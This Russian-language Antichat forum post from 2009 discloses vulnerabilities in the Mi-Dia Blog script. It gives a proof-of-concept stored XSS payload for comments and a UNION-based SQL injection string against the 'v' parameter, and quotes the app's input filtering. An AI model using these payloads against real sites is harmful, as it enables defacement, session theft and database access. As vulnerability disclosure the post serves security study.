ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Mi-Dia Blog
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Mi-Dia Blog
  #1  
Старый 08.11.2009, 06:27
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию Mi-Dia Blog
Название: Mi-Dia Blog
Автор: Christopher Shaw
Адресс оффициальной странички: http://www.mi-dia.co.uk/

Активная XSS.
В комментариях к записям блога.
Цитата:
[img]javascript:alert()[/img]
SQL Иньекция
Цитата:
?s=view&v=-1'+union+select+1,2,3,4,5,6,7,8,9+--+
Кода много, приведу тока фильтрациб.
PHP код:
$v htmlspecialchars($_GET['v']);  
$d htmlspecialchars($_GET['d']); 
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Сценарии/CMF/СMS 401 17.06.2010 17:39
Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS Corwin Сценарии/CMF/СMS 1 19.09.2009 14:01
cmd blog Дикс PHP, PERL, MySQL, JavaScript 13 16.04.2009 17:24
Уязвимости InTerra Blog Machine Dimi4 Сценарии/CMF/СMS 0 08.01.2009 00:31
Invision Community Blog 1.1.0 jusuf Форумы 1 14.07.2006 18:55



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ